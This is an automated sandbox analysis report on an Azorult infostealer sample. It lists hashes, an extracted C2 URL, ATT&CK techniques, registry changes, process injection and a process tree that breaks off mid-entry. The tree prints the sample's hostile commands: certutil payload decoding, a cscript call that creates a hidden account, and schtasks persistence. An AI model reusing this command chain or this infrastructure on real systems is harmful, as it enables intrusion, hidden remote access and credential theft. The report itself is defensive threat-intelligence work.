azorult | 5f51907b9b458b61272ad82b98c712299cb770216917f27f31edf5d69bb68ffb

Analysis

max time kernel
132s
max time network
56s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
29-12-2024 13:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
Size

3.6MB
MD5

9a3a57198f755e211d4be90a33320fcd
SHA1

4c97fb6c57008af22ded9e8e702aa2e9faabf467
SHA256

09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e
SHA512

49509e30e4bf202efb9127753dad111148bfdbb53ae5aa8f86a2aca4aa78729150e82e306505d367bd06b328f475c4753a334f5b58d21332743dd72cf6642990
SSDEEP

98304:x5aFNIJS6sXSRFAVU7RZUimDrW5++IH8JWCCtdBm3R:x5aFNH6+qRZUzrWAKJWCCtdBaR

Score

10^/10

azorult defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

azorult

http://430lodsposlok.store/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
1084	net.exe
1348	net1.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2076	powershell.exe
2108	powershell.exe
372	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 6 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2088	netsh.exe
1756	netsh.exe
1792	netsh.exe
2956	netsh.exe
2876	netsh.exe
2356	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Executes dropped EXE 10 IoCs

pid	Process
2892	rusk.com
2884	rusk.com
2756	rusk.com
2744	rusk.com
2852	rusk.com
1484	rusk.com
772	RDPWInst.exe
2296	RDPWInst.exe
1104	RDPWInst.exe
2016	RDPWInst.exe

Loads dropped DLL 11 IoCs

pid	Process
3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
2892	rusk.com
2884	rusk.com
2756	rusk.com
1280	cmd.exe
1280	cmd.exe
1280	cmd.exe
1280	cmd.exe
2992	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Deobfuscate/Decode Files or Information 1 TTPs 3 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
2364	certutil.exe
1620	certutil.exe
1816	certutil.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com
19	raw.githubusercontent.com
20	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/1484-59-0x0000000000630000-0x0000000000824000-memory.dmp	autoit_exe
behavioral1/memory/1484-62-0x0000000000630000-0x0000000000824000-memory.dmp	autoit_exe

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\CatRoot2\edb.log	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb	svchost.exe
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\dnsrsvlr.log	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\edb.chk	svchost.exe
File opened for modification	C:\Windows\System32\asyncreg.log	svchost.exe
File opened for modification	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Hide Artifacts: Hidden Users 1 TTPs 3 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\trtqiatOMC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\trtqiatOMC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\trtqiatOMC = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2892 set thread context of 2744	2892	rusk.com	39
PID 2884 set thread context of 2852	2884	rusk.com	41
PID 2756 set thread context of 1484	2756	rusk.com	42

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wrapper	rusk.com
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	rusk.com
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\plink.exe	rusk.com
File created	C:\Program Files\RDP Wrapper\plink.exe	rusk.com
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	rusk.com
File created	C:\Program Files\RDP Wrapper\autoupdate.bat	rusk.com
File opened for modification	C:\Program Files\RDP Wrapper\autoupdate.bat	rusk.com
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
888	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 56 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rusk.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
2480	timeout.exe
1508	timeout.exe
2704	timeout.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1768	schtasks.exe
2124	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2884	rusk.com
2892	rusk.com
2756	rusk.com
2076	powershell.exe
2992	svchost.exe
2992	svchost.exe
2108	powershell.exe
372	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
2556	Process not Found
1948	Process not Found
2992	svchost.exe
2992	svchost.exe
2992	svchost.exe
2992	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	656	WMIC.exe
Token: SeSecurityPrivilege	656	WMIC.exe
Token: SeTakeOwnershipPrivilege	656	WMIC.exe
Token: SeLoadDriverPrivilege	656	WMIC.exe
Token: SeSystemProfilePrivilege	656	WMIC.exe
Token: SeSystemtimePrivilege	656	WMIC.exe
Token: SeProfSingleProcessPrivilege	656	WMIC.exe
Token: SeIncBasePriorityPrivilege	656	WMIC.exe
Token: SeCreatePagefilePrivilege	656	WMIC.exe
Token: SeBackupPrivilege	656	WMIC.exe
Token: SeRestorePrivilege	656	WMIC.exe
Token: SeShutdownPrivilege	656	WMIC.exe
Token: SeDebugPrivilege	656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	656	WMIC.exe
Token: SeRemoteShutdownPrivilege	656	WMIC.exe
Token: SeUndockPrivilege	656	WMIC.exe
Token: SeManageVolumePrivilege	656	WMIC.exe
Token: 33	656	WMIC.exe
Token: 34	656	WMIC.exe
Token: 35	656	WMIC.exe
Token: SeIncreaseQuotaPrivilege	656	WMIC.exe
Token: SeSecurityPrivilege	656	WMIC.exe
Token: SeTakeOwnershipPrivilege	656	WMIC.exe
Token: SeLoadDriverPrivilege	656	WMIC.exe
Token: SeSystemProfilePrivilege	656	WMIC.exe
Token: SeSystemtimePrivilege	656	WMIC.exe
Token: SeProfSingleProcessPrivilege	656	WMIC.exe
Token: SeIncBasePriorityPrivilege	656	WMIC.exe
Token: SeCreatePagefilePrivilege	656	WMIC.exe
Token: SeBackupPrivilege	656	WMIC.exe
Token: SeRestorePrivilege	656	WMIC.exe
Token: SeShutdownPrivilege	656	WMIC.exe
Token: SeDebugPrivilege	656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	656	WMIC.exe
Token: SeRemoteShutdownPrivilege	656	WMIC.exe
Token: SeUndockPrivilege	656	WMIC.exe
Token: SeManageVolumePrivilege	656	WMIC.exe
Token: 33	656	WMIC.exe
Token: 34	656	WMIC.exe
Token: 35	656	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1928	WMIC.exe
Token: SeSecurityPrivilege	1928	WMIC.exe
Token: SeTakeOwnershipPrivilege	1928	WMIC.exe
Token: SeLoadDriverPrivilege	1928	WMIC.exe
Token: SeSystemProfilePrivilege	1928	WMIC.exe
Token: SeSystemtimePrivilege	1928	WMIC.exe
Token: SeProfSingleProcessPrivilege	1928	WMIC.exe
Token: SeIncBasePriorityPrivilege	1928	WMIC.exe
Token: SeCreatePagefilePrivilege	1928	WMIC.exe
Token: SeBackupPrivilege	1928	WMIC.exe
Token: SeRestorePrivilege	1928	WMIC.exe
Token: SeShutdownPrivilege	1928	WMIC.exe
Token: SeDebugPrivilege	1928	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1928	WMIC.exe
Token: SeRemoteShutdownPrivilege	1928	WMIC.exe
Token: SeUndockPrivilege	1928	WMIC.exe
Token: SeManageVolumePrivilege	1928	WMIC.exe
Token: 33	1928	WMIC.exe
Token: 34	1928	WMIC.exe
Token: 35	1928	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1928	WMIC.exe
Token: SeSecurityPrivilege	1928	WMIC.exe
Token: SeTakeOwnershipPrivilege	1928	WMIC.exe
Token: SeLoadDriverPrivilege	1928	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 1816	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	30
PID 3052 wrote to memory of 1816	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	30
PID 3052 wrote to memory of 1816	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	30
PID 3052 wrote to memory of 1816	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	30
PID 3052 wrote to memory of 2364	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	32
PID 3052 wrote to memory of 2364	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	32
PID 3052 wrote to memory of 2364	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	32
PID 3052 wrote to memory of 2364	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	32
PID 3052 wrote to memory of 1620	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	34
PID 3052 wrote to memory of 1620	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	34
PID 3052 wrote to memory of 1620	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	34
PID 3052 wrote to memory of 1620	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	34
PID 3052 wrote to memory of 2892	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	36
PID 3052 wrote to memory of 2892	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	36
PID 3052 wrote to memory of 2892	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	36
PID 3052 wrote to memory of 2892	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	36
PID 3052 wrote to memory of 2884	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	37
PID 3052 wrote to memory of 2884	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	37
PID 3052 wrote to memory of 2884	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	37
PID 3052 wrote to memory of 2884	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	37
PID 3052 wrote to memory of 2756	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	38
PID 3052 wrote to memory of 2756	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	38
PID 3052 wrote to memory of 2756	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	38
PID 3052 wrote to memory of 2756	3052	09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe	38
PID 2892 wrote to memory of 2744	2892	rusk.com	39
PID 2892 wrote to memory of 2744	2892	rusk.com	39
PID 2892 wrote to memory of 2744	2892	rusk.com	39
PID 2892 wrote to memory of 2744	2892	rusk.com	39
PID 2892 wrote to memory of 2744	2892	rusk.com	39
PID 2892 wrote to memory of 2744	2892	rusk.com	39
PID 2884 wrote to memory of 2852	2884	rusk.com	41
PID 2884 wrote to memory of 2852	2884	rusk.com	41
PID 2884 wrote to memory of 2852	2884	rusk.com	41
PID 2884 wrote to memory of 2852	2884	rusk.com	41
PID 2884 wrote to memory of 2852	2884	rusk.com	41
PID 2884 wrote to memory of 2852	2884	rusk.com	41
PID 2756 wrote to memory of 1484	2756	rusk.com	42
PID 2756 wrote to memory of 1484	2756	rusk.com	42
PID 2756 wrote to memory of 1484	2756	rusk.com	42
PID 2756 wrote to memory of 1484	2756	rusk.com	42
PID 2756 wrote to memory of 1484	2756	rusk.com	42
PID 2756 wrote to memory of 1484	2756	rusk.com	42
PID 1484 wrote to memory of 2848	1484	rusk.com	43
PID 1484 wrote to memory of 2848	1484	rusk.com	43
PID 1484 wrote to memory of 2848	1484	rusk.com	43
PID 1484 wrote to memory of 2848	1484	rusk.com	43
PID 2848 wrote to memory of 2876	2848	cmd.exe	45
PID 2848 wrote to memory of 2876	2848	cmd.exe	45
PID 2848 wrote to memory of 2876	2848	cmd.exe	45
PID 2848 wrote to memory of 2876	2848	cmd.exe	45
PID 1484 wrote to memory of 528	1484	rusk.com	46
PID 1484 wrote to memory of 528	1484	rusk.com	46
PID 1484 wrote to memory of 528	1484	rusk.com	46
PID 1484 wrote to memory of 528	1484	rusk.com	46
PID 528 wrote to memory of 1768	528	cmd.exe	48
PID 528 wrote to memory of 1768	528	cmd.exe	48
PID 528 wrote to memory of 1768	528	cmd.exe	48
PID 528 wrote to memory of 1768	528	cmd.exe	48
PID 1484 wrote to memory of 1048	1484	rusk.com	49
PID 1484 wrote to memory of 1048	1484	rusk.com	49
PID 1484 wrote to memory of 1048	1484	rusk.com	49
PID 1484 wrote to memory of 1048	1484	rusk.com	49
PID 1048 wrote to memory of 480	1048	cmd.exe	51
PID 1048 wrote to memory of 480	1048	cmd.exe	51

C:\Users\Admin\AppData\Local\Temp\09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe
"C:\Users\Admin\AppData\Local\Temp\09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Windows\SysWOW64\certutil.exe
  "C:\Windows\System32\certutil.exe" -decode utru.com grom
  2⤵
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  PID:1816
- C:\Windows\SysWOW64\certutil.exe
  "C:\Windows\System32\certutil.exe" -decode sfera.com hyr
  2⤵
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  PID:2364
- C:\Windows\SysWOW64\certutil.exe
  "C:\Windows\System32\certutil.exe" -decode vobo.com kij
  2⤵
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  PID:1620
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com" grom
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2744
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com" hyr
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com"
    3⤵
    - Executes dropped EXE
    PID:2852
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
  "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com" kij
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1484
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Local\Temp\nPFD.vbs" trtqiatOMC WvLGQhWjGC "C:\Users\Admin\AppData\Local\Temp\sfud.vbs" "C:\Users\Admin\AppData\Local\Temp\Frffrabn.bat" "C:\Users\Admin\AppData\Local\Temp\FyO.dll"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2848
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Local\Temp\nPFD.vbs" trtqiatOMC WvLGQhWjGC "C:\Users\Admin\AppData\Local\Temp\sfud.vbs" "C:\Users\Admin\AppData\Local\Temp\Frffrabn.bat" "C:\Users\Admin\AppData\Local\Temp\FyO.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2876
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\FyO.dll" /tn vjgt
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:528
    - - C:\Windows\SysWOW64\schtasks.exe
        
